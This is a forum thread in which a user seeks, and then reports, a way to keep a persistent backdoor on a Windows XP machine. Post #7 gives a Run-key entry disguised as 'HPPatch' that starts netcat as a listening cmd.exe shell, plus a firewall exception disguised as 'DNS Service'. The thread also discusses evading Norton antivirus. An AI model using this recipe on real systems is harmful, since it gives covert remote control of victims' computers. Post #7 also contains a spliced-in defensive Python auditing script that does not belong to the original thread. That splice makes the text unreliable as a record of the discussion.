Page 1 of 2 (results 1 to 10 of 17)

Thread: Backdooring with Metasploit

  1. #1
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Backdooring with Metasploit

    Is there any accurate way to maintain backdoor access to a computer in the case that it is rebooted? I have a lab environment set up with Windows XP and BT3, and I also have Norton AntiVirus on the XP box. When I try to upload nc.exe to the XP box, Norton picks it up as a virus and thus deletes it / moves it to quarantine on the spot. Is there any way around Norton, and does netcat allow any form of backdoor access to be maintained in the event a computer is rebooted?

    I was thinking something along the lines of using psexec and scheduling it to run with schtasks at startup, and then having psexec use netcat to forward a port to run on. Would this work?

  2. #2

  3. #3
    Junior Member
    Join Date
    Feb 2007
    Posts
    74


    Worked perfectly! Thanks for the link. So now can I just schedule nc to run in the event that the computer shuts down, using schtask?

  4. #4
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281


    As long as the system is XP Prof, yes. XP Home doesn't have schtask.
    Tiocfaidh ár lá

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328


    Speaking of the Windows at command:
    http://rmccurdy.com/scripts/RUNAS_SYSTEM.vbs

    What you want is a reverse shell; backdoors don't really do any good anymore with firewalls etc.

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Quote Originally Posted by aspekt9:
    Worked perfectly! Thanks for the link. So now can I just schedule nc to run in the event that the computer shuts down, using schtask?
    Why not modify the registry?

  7. #7
    Junior Member
    Join Date
    Feb 2007
    Posts
    74


    Quote Originally Posted by kazalku:
    Why not modify the registry?
    This was what I eventually went with:

    Code:
    REGEDIT4
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "HPPatch"="C:\Windows\system32\inetpub\nc.exe -l -L -p 5555 -d -t -e cmd.exe"
    Works like a charm, starts up on reboot and everything. I had to use CURRENT_USER, LOCAL_MACHINE wasn't allowing me to edit the registry remotely for some reason. I did have to modify the firewall settings, for that I used:

    Code:
    netsh firewall add allowedprogram C:\Windows\system32\inetpub\nc.exe "DNS Service" ENABLE
    Everything is good to go from there and seems to be working properly. However, whenever I telnet to the system I get double bashes i.e.:

    Code:
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>dir 
    
    ..... directory info here ......
    
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>
    Any idea why this occurs? It only does it if I telnet, not if I use netcat to connect.
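    One check a defender would run against the kind of autorun entry shown above, as an added example that is not code from this thread: a Python script that parses the .reg format used in the post, keeps only values under Run-style keys, and flags entries whose image is a known remote-shell tool or that hand a command shell to another program as an argument. The sample export is constructed for the example (the first entry is the one from the post), and the lists of tool names and shell names are assumptions, not anything the thread states.

```python
"""Audit exported Run-key entries for shell-spawning autoruns (added example)."""
import re
from dataclasses import dataclass

# Constructed sample export. The first entry is the one discussed in this thread
# (hand-written REGEDIT4 style, single backslashes); the other two are benign
# entries in the doubled-backslash form regedit itself produces on export.
SAMPLE_REG = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"HPPatch"="C:\Windows\system32\inetpub\nc.exe -l -L -p 5555 -d -t -e cmd.exe"
"OneDrive"="\"C:\\Users\\lab\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''

AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)$", re.I)
STRING_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SHELLS = ("cmd.exe", "command.com", "powershell.exe")        # assumed list
REMOTE_SHELL_TOOLS = ("nc.exe", "nc64.exe", "ncat.exe", "netcat.exe")  # assumed list


@dataclass
class Finding:
    key: str
    name: str
    command: str
    reasons: list


def reg_unescape(s):
    """Undo the two escapes regedit writes (doubled backslash, backslash-quote);
    a lone backslash is left alone so hand-written files parse too."""
    return re.sub(r'\\([\\"])', r'\1', s)


def parse_autoruns(reg_text):
    """Yield (key, value_name, command) for string values under Run-style keys."""
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            current = key if AUTORUN_KEY_RE.search(key) else None
            continue
        if current is None:
            continue
        m = STRING_VALUE_RE.match(line)
        if m:
            yield current, reg_unescape(m.group(1)), reg_unescape(m.group(2))


def split_command(command):
    """Return (image path, argument string), honouring a quoted image path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end], command[end + 1:].strip()
    exe, _, args = command.partition(" ")
    return exe, args


def assess(key, name, command):
    """Return a Finding for a suspicious autorun, or None if nothing stands out."""
    exe, args = split_command(command)
    image = exe.rsplit("\\", 1)[-1].lower()
    reasons = []
    if image in REMOTE_SHELL_TOOLS:
        reasons.append(f"image is a known remote-shell tool ({image})")
    if any(shell in args.lower() for shell in SHELLS):
        reasons.append("a command shell is passed as an argument to another program")
    if reasons and key.upper().startswith("HKEY_CURRENT_USER"):
        reasons.append("per-user Run key: writable without administrator rights")
    return Finding(key, name, command, reasons) if reasons else None


def audit(reg_text):
    """All suspicious autorun entries in an exported .reg text."""
    return [f for f in (assess(*e) for e in parse_autoruns(reg_text)) if f]


if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f"[{f.key}] {f.name} = {f.command}")
        for r in f.reasons:
            print("   -", r)
```

    Run it against a `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` dump (and the HKLM equivalent) to get the same view an Autoruns-style tool gives; the value name ("HPPatch") is deliberately ignored, since the friendly name is the one thing an attacker chooses freely, while the image path and arguments are what the entry actually executes.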

  8. #8
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Quote Originally Posted by aspekt9:
    I had to use CURRENT_USER, LOCAL_MACHINE wasn't allowing me to edit the registry remotely for some reason.
    You need to have admin access to do that. Use
    Code:
    net localgroup administrators
    to find out whether the current user is in the admin group or not.

    Quote Originally Posted by aspekt9:
    However, whenever I telnet to the system I get double bashes i.e.:

    Code:
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>dir 
    
    ..... directory info here ......
    
    C:\windows\system32\inetpub>
    C:\windows\system32\inetpub>
    Any idea why this occurs? It only does it if I telnet, not if I use netcat to connect.
    I don't know...... I don't have to know everything...

  9. #9
    Junior Member
    Join Date
    Feb 2007
    Posts
    74


    Hah, thanks. Also, the user is an Administrator, so I don't understand why it wouldn't let me write to it. It didn't give me an error, and when I had the registry open it looked like it refreshed, but nothing was updated. Also, if I open the reg file on the physical computer, it inserts into the registry fine.

  10. #10
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416


    Quote Originally Posted by aspekt9:
    Hah, thanks. Also, the user is an Administrator, so I don't understand why it wouldn't let me write to it. It didn't give me an error, and when I had the registry open it looked like it refreshed, but nothing was updated. Also, if I open the reg file on the physical computer, it inserts into the registry fine.
    Can you modify it locally? Just to check that the registry is not locked by third-party software...

    Hahh, you just added the last line...... phew........ no idea...
